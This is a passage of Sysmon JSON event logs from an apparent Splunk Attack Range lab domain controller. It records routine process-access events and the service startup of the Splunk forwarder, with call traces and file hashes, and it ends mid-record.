{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3076,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.792\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.792","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3077,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.792\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.792","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3078,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.792\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.792","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3079,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.792\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.792","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3080,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.792\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.792","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3081,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.792\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-001095160500}\r\nTargetProcessId: 2272\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.792","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-001095160500}","TargetProcessId":"2272","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3082,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.054\r\nProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nProcessId: 2868\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {A837DB8D-01B3-5F25-0000-001020530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.054","ProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{A837DB8D-01B3-5F25-0000-001020530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3083,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.043\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 944\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+4c6c|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.043","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"944","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+4c6c|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3084,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.043\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 